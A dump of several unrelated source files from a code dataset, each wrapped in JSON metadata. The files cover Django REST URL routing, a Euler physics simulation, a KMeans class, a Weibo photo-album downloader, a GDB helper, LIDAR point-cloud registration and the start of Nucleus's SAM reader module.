views.OuterViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\ninner_list = views.InnerViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\ninner_detail = views.InnerViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nplaylist_list = views.PlaylistViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nplaylist_detail = views.PlaylistViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nurlpatterns = format_suffix_patterns([\n url(r'outer/$', outer_list, name='outer_list'),\n url(r'outer/(?P[0-9]+)/$', outer_detail, name='outer_detail'),\n url(r'inner/$', inner_list, name='inner_list'),\n url(r'inner/(?P[0-9]+)/$', inner_detail, name='inner_detail'),\n url(r'playlist/$', playlist_list, name='playlist_list'),\n url(r'playlist/(?P[0-9]+)/$', playlist_detail, name='playlist_detail'),\n url(r'$', views.api_root),\n])\n","sub_path":"django_base/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"353299295","text":"#!/usr/bin/python\n\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef g():\n return 9.80665\n\n\ndef euler(theta, tf, dt, vf = 0):\n sin_t = math.sin(theta)\n t = 0.0\n y = 0.0\n v = 0.0\n y_vec = []\n v_vec = []\n t_vec = []\n while(t <= tf):\n y += v*dt\n v += g()*sin_t*dt\n if vf != 0:\n v *= (1-(v/vf))\n y_vec.append(y)\n v_vec.append(v)\n t_vec.append(t)\n t += dt\n return y_vec, v_vec, t_vec\n\n\ndef euler_cromer(theta, tf, dt, vf = 0):\n sin_t = math.sin(theta)\n t = 0.0\n y = 0.0\n v = 0.0\n y_vec = []\n v_vec = []\n t_vec = []\n while(t <= tf):\n v += g()*sin_t*dt\n if vf != 0:\n v *= (1-(v/vf))\n y += v*dt\n y_vec.append(y)\n v_vec.append(v)\n t_vec.append(t)\n t += dt\n return y_vec, v_vec, t_vec\n\n\n#------------------------------------------------------------------------------\n\n# Dados iniciais\ntheta = 0.122173 # 7 graus\ntf = 6.0\ndt = 0.1\n\n# Mude esta linha para obter diferentes constantes de atrito\nvf = 40 # velocidade terminal (0: sem resistência)\n\npos, vel, t = euler(theta, tf, dt, vf)\npos_c, vel_c, t_c = euler_cromer(theta, tf, dt, vf)\n\n# Euler\nplt.plot(t, pos, label = \"Posição (m)\")\nplt.plot(t, vel, label = \"Velocidade (m/s)\")\n\n# Euler-Cromer\nplt.plot(t_c, pos_c, label = \"Posição - Cromer (m)\")\nplt.plot(t_c, vel_c, label = \"Velocidade - Cromer (m/s)\")\n\n# Dados coletados\ndata = [0.0, 2.6, 4.08, 5.18, 5.88]\ny = [0.0, 2.5, 5, 7.5, 10.0]\nplt.plot(data, y, 's', label = \"Posição coletada (m)\")\n\nplt.legend(loc=2)\nplt.xlabel('Tempo (s)')\nplt.show()\n","sub_path":"Old/6º Semestre/Modelagem & Simulação/EP2/rampa.py","file_name":"rampa.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"480377909","text":"# Подсчитать, сколько было выделено памяти под переменные в ранее разработанных программах\n# в рамках первых трех уроков. Проанализировать результат и определить программы с наиболее\n# эффективным использованием памяти.\n\nimport sys\n\n# Урок 3, задача 8\n# Матрица 5x4 заполняется вводом с клавиатуры кроме последних элементов строк.\n# Программа должна вычислять сумму введенных элементов каждой строки и записывать ее\n# в последнюю ячейку строки. В конце следует вывести полученную матрицу.\n\na = []\n\nfor i in range(5):\n b = []\n for j in range(3):\n b.append(int(input(f'Введите элемент {i + 1}-{j + 1}: ')))\n b.append(b[0] + b[1] + b[2])\n a.append(b)\n\nfor i in range(5):\n print()\n for j in range(4):\n print(a[i][j], end=' ')\n\n\n# подсчет памяти\nsum_var = sys.getsizeof(a) + sys.getsizeof(b) + sys.getsizeof(i) + sys.getsizeof(j)\nprint(sum_var)\n\n# Python 3.9.5\n# Windows, 64-разрядная ОС\n\n# Запуск позволил определить, что объем памяти - 264 байта\n# Под списки отведено 120 и 88 байт, под остальные переменные (int) - 28 байт\n# Объем под переменные зависит от счетчика ссылок на объект, ссылки на тип объекта, версии Python\n\n# Общие выводы в первой задаче\n","sub_path":"dz6_task2.py","file_name":"dz6_task2.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"55617757","text":"import json\nfrom botocore.vendored import requests\nfrom python.shared import BeautifulSoup\n\ndef news(event, context):\n\n result = requests.get('https://www.inside.com.tw/?page=1')\n\n html = result.text\n\n soup = BeautifulSoup(html, 'html.parser')\n\n # delete special div in index\n if soup.find('div',class_='Independent_study'):\n soup.find('div',class_='Independent_study').decompose()\n\n if soup.find('div',class_='Independent_study_down'):\n soup.find('div',class_='Independent_study_down').decompose()\n\n posts = soup.find_all('div',class_='post_list_item')\n resp=[]\n\n for item in posts:\n # print(item)\n obj = item.find('a', class_='js-auto_break_title')\n if not isinstance(obj,type(None)):\n resp.append({\n 'title':item.find('a', class_='js-auto_break_title').text,\n 'url': item.find('a', class_='js-auto_break_title')['href'],\n 'description':item.find('p', class_='post_description').text\n })\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(resp)\n }\n\n return response\n","sub_path":"api/crawler/inside.py","file_name":"inside.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"566341755","text":"# -*- coding: UTF-8 -*-\n# ver: Python-2.7.10\n\nimport urllib\nimport os\nimport sys\nimport datetime\nimport json\n\n# progressbar-2.3\nfrom progressbar import ProgressBar\n\nimport func\nfunc.init()\n\n# path:\ndownPath = func.downPath + 'weibo\\\\'\n\n# name:\ncookieFileName = 'weibo.txt'\n\n# URL:\nhostURL = 'http://photo.weibo.com/'\nalbumGetURL = '/albums/get_all?'\nphotoGetURL = hostURL + 'photos/get_all?'\nlargePicURL = 'http://ww4.sinaimg.cn/large/'\n\nif not os.path.isdir(downPath):\n os.mkdir(downPath)\n \n# get cookie & make headers\nif not os.path.isfile(func.cookiePath + cookieFileName):\n print('cookie file not found...(%s)' % (func.cookiePath + cookieFileName))\n sys.exit()\nfp = open(func.cookiePath + cookieFileName)\ncookie = fp.readline()\nfp.close()\nheaders = func.headers_for_urllib2\nheaders['Cookie'] = cookie\n \n# get WeiboUID\nWeiboUID = input('input WeiboUID:')\n\n# get Albums from index\nindex = json.loads(func.getJSHtml(hostURL + str(WeiboUID) + albumGetURL, headers = headers))\n\n# perpare to download\nif index['data']['total'] == 0:\n print('WeiboUID error or no this UID')\n sys.exit()\nif not os.path.isdir(downPath + str(WeiboUID)):\n os.mkdir(downPath + str(WeiboUID))\ndownPath = downPath + str(WeiboUID) + '\\\\'\n\n# get photoName in each Albums and download\nprint('downloading...')\nfor album in index['data']['album_list']:\n newPhotoCount = 0\n if not os.path.isdir(downPath + album['caption']):\n os.mkdir(downPath + album['caption'])\n print('albumName:%s\\ncount:%d' % (album['caption'], album['count']['photos']))\n \n photoCount = album['count']['photos']\n progress = ProgressBar(maxval = album['count']['photos'])\n progress.start()\n count = 0\n page = 1\n while photoCount > 0:\n photos = json.loads(func.getJSHtml(photoGetURL +\n 'uid=' + str(WeiboUID) +\n '&album_id=' + str(album['album_id']) +\n '&count=100' +\n '&type=' + str(album['type']) +\n '&page=' + str(page),\n headers = headers))\n for photo in photos['data']['photo_list']:\n if not os.path.isfile(downPath + album['caption'] + '\\\\%s.jpg' % (photo['photo_id'])):\n imgurl = largePicURL + photo['pic_name']\n urllib.urlretrieve(imgurl, downPath + album['caption'] + '\\\\%s.jpg' % (photo['photo_id']))\n newPhotoCount += 1\n count += 1\n progress.update(count)\n photoCount -= 100\n page += 1\n progress.finish()\n print('new pic count:%d\\n' % (newPhotoCount))\n\nfp = open(downPath + 'log.txt', 'a+')\nhomePage = func.getJSHtml(hostURL + str(WeiboUID), headers = headers)\nname = func.dealHtml(nameRE, homePage)[0]\nfp.write('time:%s\\nname:%s\\n\\n' % (datetime.datetime.now(), name))\nfp.close()\n","sub_path":"Python/ImageDownloader/Weibo_Albums.py","file_name":"Weibo_Albums.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576581351","text":"#!/bin/python3\n\nimport sys\n\n\ndef staircase(n):\n # Complete this function\n n1 = 0\n n2 = 0\n for i in range(n):\n arr = []\n for j in range(n - i - 1):\n print(\" \",end=\"\")\n for k in range(i + 1):\n print(\"#\", end=\"\")\n print('\\t')\n\n\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n staircase(n)\n","sub_path":"Leetcode_test/2_printTrankle.py","file_name":"2_printTrankle.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"512977502","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\n__author__ = \"Andrew Bian\"\n\nimport xml.etree.ElementTree as ET\nimport logging\nfrom platform import system\n\nif system() == 'Windows':\n path_prefix = __file__[:__file__.rfind('\\\\') + 1] + '../'\nelse:\n path_prefix = __file__[:__file__.rfind('/') + 1] + '../'\n\n\nDATAPATH = {\n 'sbgv_daily_status_path': path_prefix + 'data/sbgv/daily_status/',\n 'sbgv_daily_inflow_path': path_prefix + 'data/sbgv/daily_inflow/',\n 'sbgv_daily_outflow_path': path_prefix + 'data/sbgv/daily_outflow/',\n 'sbgv_yearly': path_prefix + 'data/sbgv/yearly/',\n 'sbgv_all': path_prefix + 'data/sbgv/',\n 'sbg_daily_status_path': path_prefix + 'data/sbg/daily_status/',\n 'sbg_daily_inflow_path': path_prefix + 'data/sbg/daily_inflow/',\n 'sbg_daily_outflow_path': path_prefix + 'data/sbg/daily_outflow/',\n 'sbg_yearly': path_prefix + 'data/sbg/yearly/',\n 'sbg_all': path_prefix + 'data/sbg/',\n 'issue': path_prefix + 'data/issue_data/',\n}\n\n# ------------------------------------------------------------------------\n# storage api functions\n# ------------------------------------------------------------------------\n\n\n\ndef get_day_trlist(in_date, category, tag):\n filepath = build_path(in_date, category, tag)\n return get_trlist(filepath)\n\n\ndef get_day_trnum(in_date, category, tag):\n root = get_rootele(in_date, category, tag)\n elements = root.find('elements')\n row_num = len(elements.findall('row'))\n return row_num\n\n\ndef get_day_trlist_raw(in_date, category):\n filepath = build_path(in_date, category)\n return ET.parse(filepath)\n\n\ndef write_day_trlist_raw(in_date, category, data):\n filepath = build_path(in_date, category)\n data.write(filepath)\n\n\n# x stands for get data from yearly data file\ndef get_year_trlist(year, tag):\n filepath = build_path_year(year, tag)\n return get_trlist(filepath)\n\n\ndef get_all_trlist(tag):\n filepath = build_path_all(tag)\n return get_trlist(filepath)\n\ndef get_issue_list():\n filepath = build_path_issue()\n return get_trlist(filepath)\n\n# ------------------------------------------------------------------------\n# helper functions\n# ------------------------------------------------------------------------\n\n\ndef get_trlist(filepath):\n tree = ET.parse(filepath)\n root = tree.getroot()\n treedict = xml_to_dict(root[1])\n rawtrs = treedict.values()[0]\n rawtrs = [rawtr['row'] for rawtr in rawtrs]\n trlist = [build_trobject(rawtr) for rawtr in rawtrs]\n return trlist\n\n\ndef build_path(in_date, category, tag):\n return DATAPATH[tag + '_' + category + '_path'] + in_date.isoformat() + \".xml\"\n\n\ndef build_path_all(tag):\n return DATAPATH[tag + '_' + 'all'] + 'all.xml'\n\ndef build_path_issue():\n return DATAPATH['issue'] + 'issue.xml'\n\ndef build_path_year(year, tag):\n return DATAPATH[tag + '_' + 'yearly'] + str(year) + '.xml'\n\n\ndef get_rootele(in_date, category, tag):\n filepath = DATAPATH[tag + '_' + category + '_path'] + in_date.isoformat() + \".xml\"\n tree = ET.parse(filepath)\n root = tree.getroot()\n return root\n\n\ndef xml_to_dict(el):\n d = {}\n if el.text:\n d[el.tag] = el.text\n else:\n d[el.tag] = {}\n children = el.getchildren()\n if children:\n d[el.tag] = [xml_to_dict(child) for child in children]\n return d\n\n\ndef build_trobject(rawtr):\n tr = {}\n for column in rawtr:\n tr[column['column'][0]['name']] = column['column'][1]['value']\n return tr\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"tr_statistics/module/storage_xml.py","file_name":"storage_xml.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127286147","text":"\nfrom django.shortcuts import render, get_object_or_404, redirect, Http404\nfrom django.contrib.admin.views.decorators import staff_member_required\n\nfrom .forms import ArticleCreateForm, ArticleEditForm\nfrom .models import Article\nfrom .filters import slugify\n\n\n# Create your views here.\n\n\ndef home_view(request):\n head_title = \"Blog\"\n main_head = \"Blog\"\n article = Article.objects.order_by('num_views').last()\n context = {\n \"main_head\": main_head,\n \"head_title\": head_title,\n 'article': article,\n }\n return render(request, 'home.html', context)\n\n#CRUD (with list as part of retieve)\n#Create\n@staff_member_required\ndef article_create_view(request):\n form = ArticleCreateForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.slug = slugify(form.cleaned_data['title'])\n obj.author = request.user\n obj.save()\n form = ArticleCreateForm()\n\n head_title = \"Create Article\"\n main_head = \"Create Article\"\n\n context = {\n 'form': form,\n \"head_title\": head_title,\n \"main_head\": main_head,\n }\n return render(request, 'article_create.html', context)\n\n\n#Retrieve\ndef article_detail_view(request, slug):\n article = get_object_or_404(Article, slug=slug)\n article.num_views += 1\n article.save()\n head_title = article.title\n main_head = \"Selected Article:\"\n context = {\n \"article\": article,\n \"head_title\": head_title,\n \"main_head\": main_head,\n }\n return render(request, 'article_detail.html', context)\n\n\n#List\ndef articles_view(request):\n queryset = Article.objects.all() if request.user.is_staff else Article.objects.published()\n head_title = \"Articles\"\n main_head = \"Articles\"\n context = {\n \"object_list\": queryset,\n \"head_title\": head_title,\n \"main_head\": main_head,\n }\n return render(request, 'articles.html', context)\n\n\n#Update\n@staff_member_required\ndef article_edit_view(request, slug):\n article = get_object_or_404(Article, slug=slug)\n if not request.user.is_superuser and request.user != article.author:\n raise Http404\n form = ArticleEditForm(request.POST or None, instance=article)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.slug = slugify(form.cleaned_data['title'])\n obj.save()\n return redirect(f\"/articles/{obj.slug}\")\n head_title = \"Edit Article\"\n main_head = \"Edit Article\"\n context = {\n \"article\": article,\n \"head_title\": head_title,\n \"main_head\": main_head,\n \"form\": form,\n }\n return render(request, 'article_edit.html', context)\n\n\n#Delete\n@staff_member_required\ndef article_delete_view(request, slug):\n article = get_object_or_404(Article, slug=slug)\n if not request.user.is_superuser and request.user != article.author:\n raise Http404\n if request.method == \"POST\":\n article.delete()\n return redirect(\"/articles\")\n head_title = \"Delete Article\"\n main_head = \"Delete Article\"\n context = {\n \"article\": article,\n \"head_title\": head_title,\n \"main_head\": main_head,\n }\n return render(request, 'article_delete.html', context)\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163558451","text":"# Google # Amazon\n# https://leetcode.com/problems/minimum-difference-between-largest-and-smallest-value-in-three-moves/\n\n# O(n logn) time, O(1) space\nclass Solution:\n def minDifference(self, nums: List[int]) -> int:\n nums.sort()\n if len(nums) <= 4:\n return 0\n \n diff1 = nums[-1] - nums[3]\n diff2 = nums[-2] - nums[2]\n diff3 = nums[-3] - nums[1]\n diff4 = nums[-4] - nums[0]\n return min(diff1, diff2, diff3, diff4)\n\n# Optimization by creating priority queue for whole array\n# O(log n) time (from O(k log n) where k = 3), O(n) space \nimport heapq\nclass Solution:\n def minDifference(self, nums: List[int]) -> int:\n if len(nums) <= 4:\n return 0\n \n minus_nums = [-num for num in nums]\n heapq.heapify(nums)\n heapq.heapify(minus_nums)\n \n min1 = heapq.heappop(nums)\n min2 = heapq.heappop(nums)\n min3 = heapq.heappop(nums)\n min4 = heapq.heappop(nums)\n \n max1 = - heapq.heappop(minus_nums)\n max2 = - heapq.heappop(minus_nums)\n max3 = - heapq.heappop(minus_nums)\n max4 = - heapq.heappop(minus_nums)\n \n return min(max1-min4, max2-min3, max3-min2, max4-min1)\n\n# Alternative optimization by keeping a priority queue of size k (3)\n# Note, this approach is used by heapq.nlargest and heapq.nsmallest\n# O(n) time (from O(n log k)), O(n) space\nimport heapq\nclass Solution:\n def minDifference(self, nums: List[int]) -> int:\n if len(nums) <= 4:\n return 0\n maxs = heapq.nlargest(4, nums)\n mins = heapq.nsmallest(4, nums)\n return min(maxs[0]-mins[3], maxs[1]-mins[2], maxs[2]-mins[1], maxs[3]-mins[0])","sub_path":"leetcode/1509_MinimumDifferenceBetweenLargestAndSmallestValueInThreeMoves.py","file_name":"1509_MinimumDifferenceBetweenLargestAndSmallestValueInThreeMoves.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"35089804","text":"import gdb\n\nclass LogHeaderDbg (gdb.Command):\n \"\"\" \"\"\"\n loghdr_meta = []\n loghdr = []\n\n def __init__ (self):\n super (LogHeaderDbg, self).__init__ (\"lhdbg\",\n gdb.COMMAND_SUPPORT,\n gdb.COMPLETE_NONE)\n def invoke (self, args, from_tty):\n args = args.split()\n if len(args) < 1:\n print (\"usage: lhdbg [save/show] logheader_meta\")\n return\n\n if args[0] == \"save\":\n loghdr_meta = gdb.parse_and_eval(args[1])\n self.loghdr_meta.append(loghdr_meta)\n\n '''\n # example to access fields in struct\n print loghdr_meta.type\n for name, field in loghdr_meta.type.iteritems():\n print name, field\n '''\n\n loghdr = loghdr_meta['loghdr']\n self.loghdr.append(loghdr.dereference())\n\n #print loghdr_meta.dereference(loghdr_meta.loghdr)\n elif args[0] == \"show\":\n for i, l in enumerate(self.loghdr_meta):\n print (\"index - \", i)\n print (\"loghdr_meta: \", l)\n print (\"loghdr: \", self.loghdr[i])\n else:\n print (\"Unsupported command\")\n return\n\nLogHeaderDbg()\n","sub_path":"gdb_python_modules/logheader_dbg.py","file_name":"logheader_dbg.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"213054374","text":"import numpy as np\r\nimport math\r\nfrom copy import deepcopy\r\n\r\n\r\nclass KMeans(object):\r\n\r\n def __init__(self, k=3, tolerancia=0.001, max_iterations=500):\r\n self.k = k\r\n self.tolerancia = tolerancia\r\n self.max_iterations = max_iterations \r\n\r\n def fit(self, data, n_clusters=3):\r\n self.initialize_centroids(data)\r\n for _ in range(self.max_iterations):\r\n self.otimizado = True\r\n self.initialize_classes() \r\n\r\n # Calcula a distancia entre os pontos e os clusters. Escolhe o centroid mais proximo\r\n for sample in data:\r\n distances = [self.Distancia_Euclidiana(sample, centroid) for centroid in self.centroids]\r\n classification = distances.index(min(distances))\r\n self.classes[classification].append(sample)\r\n \r\n self.recalcular_centroids()\r\n\r\n # Termina se estiver otimizado: se os centroids alteram pouco a posicao(menos que a tolerancia definida)\r\n if self.otimizado:\r\n break \r\n\r\n \r\n def initialize_centroids(self, data):\r\n self.centroids = []\r\n # Os primeiros 'k' elementos do dataset serão os centroids iniciais\r\n for i in range(self.k):\r\n self.centroids.append(data[i])\r\n \r\n def initialize_classes(self):\r\n self.classes = {}\r\n for i in range(self.k):\r\n self.classes[i] = []\r\n\r\n def recalcular_centroids(self):\r\n anterior = deepcopy(self.centroids)\r\n # Recalcula os centroids com base na média dos pontos do cluster\r\n for classification in self.classes:\r\n self.centroids[classification] = np.average(self.classes[classification], axis = 0)\r\n\r\n for i in range(len(self.centroids)):\r\n centroid_original = anterior[i]\r\n centroid_atual = self.centroids[i]\r\n \r\n if np.sum(np.abs((centroid_atual - centroid_original)/centroid_original) * 100.0) > self.tolerancia:\r\n self.otimizado = False\r\n\r\n def Distancia_Euclidiana(self, matriz_A, matriz_B):\r\n distancia = 0\r\n for i in range(len(matriz_A)):\r\n distancia += (matriz_A[i] - matriz_B[i]) ** 2\r\n \r\n ed = math.sqrt(distancia)\r\n return ed \r\n","sub_path":"MachineLearning/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"93467658","text":"import numpy as np\nimport pandas as pd\nimport itertools as it\n\nfrom . import transform_3d as t3d\n\nclass PathModelBase(object):\n def __init__(self, path_df):\n self._path_df = path_df\n self._time_s = None\n def get_heading_at_samples(self):\n raise NotImplementedError()\n def get_location_at_samples(self):\n raise NotImplementedError()\n def set_time_samples(self, time_s):\n self._time_s = time_s\n\nclass DumbHeuristicPathModel(PathModelBase):\n \"\"\"\n This model makes a couple of extremely brittle assumptions:\n 1) The car travels in a straight line in all dimensions.\n 2) Only the ordering of the time samples matters; absolute time does not.\n 3) GPS packets and LIDAR packets are sampled at the same times.\n \"\"\"\n\n def __init__(self, *args, **dargs):\n super(DumbHeuristicPathModel, self).__init__(*args, **dargs)\n self._path_df = self._path_df.sort('t')\n self._norms = self._path_df[['x', 'y', 'z']].diff().fillna(0).apply(np.linalg.norm, axis=1)\n\n def set_time_samples(self, time_s):\n super(DumbHeuristicPathModel, self).set_time_samples(time_s)\n t_min = min(self._path_df['t'].min(), self._time_s.min())\n self._path_df['t_norm'] = self._path_df['t']-t_min\n self._time_s = self._time_s-t_min\n\n def get_location_at_samples(self):\n dy = -self._norms.cumsum()[:-1]\n locs = pd.DataFrame({'x': 0.0, 'y': dy, 'z': 0.0})\n grouper = pd.cut(self._time_s,\n bins=self._path_df['t_norm'],\n labels=xrange(len(dy)),\n )\n return locs, grouper\n\n def get_heading_at_samples(self):\n N = len(self._time_s)\n vec = pd.DataFrame({'x': 0.0, 'y': 1.0, 'z': 0.0}, index=[0])\n grouper = np.zeros(N, dtype=int)\n return vec, grouper\n\n\nclass ZipperPathModel(DumbHeuristicPathModel):\n\n def __init__(self, *args, **dargs):\n super(DumbHeuristicPathModel, self).__init__(*args, **dargs)\n self._path_df = self._path_df.sort('t')\n self._norms = self._path_df[['x', 'y']].diff().fillna(0).apply(np.linalg.norm, axis=1)\n\n def get_location_at_samples(self):\n dy = -self._norms.cumsum()[:-1]\n locs = pd.DataFrame({'x': 0.0, 'y': dy, 'z': 0.0})\n counter = it.count(-1)\n time_df = pd.DataFrame({'t': self._time_s}).sort('t')\n _helper = lambda _df: pd.Series({'group': counter.next()})\n _grouper = time_df.groupby('t').apply(_helper)\n result = time_df.join(_grouper, on='t')\n return locs, result['group']\n\n\nclass Registrar(object):\n _required_fields = ['x', 'y', 'z', 't']\n \n def __init__(self, lidar_df, gps_df, lidar_axis=None, pathcls=None):\n assert all([_f in lidar_df.columns for _f in self._required_fields]), \"Required fields missing!\"\n assert all([_f in gps_df.columns for _f in self._required_fields]), \"Required fields missing!\"\n self._lidar_df = lidar_df\n self._gps_df = gps_df\n if lidar_axis is None:\n self._lidar_axis = np.array([0.0, 1.0, 0.0])\n if pathcls is None:\n self._PathModelCls = DumbHeuristicPathModel\n \n def compute(self):\n _t_s = self._lidar_df['t']\n path_model = self.build_path_model()\n path_model.set_time_samples(_t_s)\n self._result = self._lidar_df[['x', 'y', 'z']]\n self._do_translations(path_model) # have to translate before we rotate; no communitivity here\n self._do_rotations(path_model)\n \n def _do_translations(self, path_model):\n vecs, grouper = path_model.get_location_at_samples()\n transforms = vecs.apply(t3d.Translation.from_vector, axis=1)\n self._result = self._apply_many_transforms(self._result, transforms, grouper)\n\n def _do_rotations(self, path_model):\n vecs, grouper = path_model.get_heading_at_samples()\n _helper = lambda _df: t3d.Rotation.from_two_vectors(_df, self._lidar_axis)\n transforms = vecs.apply(_helper, axis=1)\n self._result = self._apply_many_transforms(self._result, transforms, grouper)\n \n def _apply_many_transforms(self, xyz_df, transforms, grouper):\n _helper = lambda _df: self._apply_transform(_df, transforms[_df.name])\n result = xyz_df.groupby(grouper).apply(_helper)\n result.reset_index(inplace=True)\n return result[['x', 'y', 'z']]\n\n def _apply_transform(self, xyz_df, transform):\n result = transform(xyz_df.T).T\n return pd.DataFrame({'x': result[:, 0], 'y': result[:, 1], 'z': result[:, 2]})\n \n def build_path_model(self):\n return self._PathModelCls(self._gps_df)\n\n def get_result(self):\n return self._result\n","sub_path":"cloudlab/pcd_reg.py","file_name":"pcd_reg.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365221819","text":"# -*- coding: utf-8 -*-\n\n# cbz から表紙のサムネイル画像を生成する\n# -resize 200x200 オプションで画像を生成する\n\nimport configparser\nimport io\nimport os\nimport os.path\nimport subprocess\nimport sys\n\nclass CommandExecutor():\n def __init__(self):\n self.COMMAND = 'magick \"{0}\" -alpha off \"{1}\"'\n\n def execute(self, src, dst):\n command = self.COMMAND.format(src, dst)\n print(command)\n subprocess.call(command, shell=True)\n\ndef create_image(src_path, dst_path):\n executor = CommandExecutor()\n executor.execute(src_path, dst_path)\n\ndef extract_alpha():\n src = 'yamato'\n \n folders = os.listdir(src)\n for file_name in folders:\n file_path = os.path.join(src, file_name)\n dst = os.path.splitext(os.path.basename(file_name))[0] + \".png\"\n create_image(file_path, dst)\n\n print(\"finish.\")\n\nif __name__ == '__main__':\n extract_alpha()\n","sub_path":"python3/extract_alpha.py","file_name":"extract_alpha.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443608928","text":"class Children:\n _name = \"\"\n _surname = \"\"\n _age = 0\n def __init__(self,name,surname,age):\n self._name = name\n self._surname = surname\n self._age = age\n def getData(self):\n print(\"name: \",self._name)\n print(\"surname: \",self._surname)\n print(\"age: \",self._age)\none = Children(\"OneName\",\"OneSurname\",12)\none.getData()\ntwo = Children(\"TwoName\",\"TwoSurname\",10)\ntwo.getData()","sub_path":"23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"353773311","text":"# Copyright 2018 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Classes for reading and writing SAM and BAM files.\n\nAPI for reading:\n with SamReader(input_path) as reader:\n for read in reader:\n process(reader.header, read)\n\nAPI for writing:\n\n with SamWriter(output_path) as writer:\n for read in reads:\n writer.write(read)\n\nwhere read is a nucleus.genomics.v1.Read protocol buffer.\n\nIf the path contains '.tfrecord', a TFRecord file is assumed; otherwise\nit is treated as a true SAM file. Also, file names ending with '.gz'\nare assumed to be compressed.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\n\nfrom nucleus.io import genomics_reader\nfrom nucleus.io import genomics_writer\nfrom nucleus.io.python import sam_reader\nfrom nucleus.protos import index_pb2\nfrom nucleus.protos import reads_pb2\n\n\nclass NativeSamReader(genomics_reader.GenomicsReader):\n \"\"\"Class for reading from native SAM files.\n\n Most users will want to use SamReader instead, because it dynamically\n dispatches between reading native SAM files and TFRecord files based\n on the filename's extensions.\n \"\"\"\n\n def __init__(self, input_path,\n use_index=True,\n read_requirements=None,\n parse_aux_fields=False,\n hts_block_size=None,\n downsample_fraction=None,\n random_seed=None):\n \"\"\"Initializes a NativeSamReader.\n\n Args:\n input_path: string. A path to a resource containing SAM/BAM records.\n Currently supports SAM text format and BAM binary format.\n use_index: optional bool, defaulting to True. If True, we will attempt to\n load an index file for reads_source to enable the query() API call. If\n True an index file must exist. If False, we will not attempt to load an\n index for reads_source, disabling the query() call.\n read_requirements: optional ReadRequirement proto. If not None, this proto\n is used to control which reads are filtered out by the reader before\n they are passed to the client.\n parse_aux_fields: optional bool. If False, the default, we will not parse\n the auxillary fields of the SAM/BAM records (see SAM spec for details).\n Parsing the aux fields is often unnecessary for many applications, and\n adds a significant parsing cost to access. If you need these aux fields,\n set parse_aux_fields to True and these fields will be parsed and\n populate the appropriate Read proto fields (e.g., read.info).\n hts_block_size: integer or None. If None, will use the default htslib\n block size. Otherwise, will configure the underlying block size of the\n underlying htslib file object. Larger values (e.g. 1M) may be\n beneficial for reading remote files.\n downsample_fraction: None or float in the interval [0.0, 1.0]. If not\n None or 0.0, the reader will only keep each read with probability\n downsample_fraction, randomly.\n random_seed: None or int. The random seed to use with this sam reader, if\n needed. If None, a fixed random value will be assigned.\n\n Raises:\n ValueError: If downsample_fraction is not None and not in the interval\n (0.0, 1.0].\n ImportError: If someone tries to load a tfbam file.\n \"\"\"\n if input_path.endswith('.tfbam'):\n # Delayed loading of tfbam_lib.\n try:\n from tfbam_lib import tfbam_reader # pylint: disable=g-import-not-at-top\n self._reader = tfbam_reader.make_sam_reader(\n input_path,\n read_requirements=read_requirements,\n use_index=use_index,\n unused_block_size=hts_block_size,\n 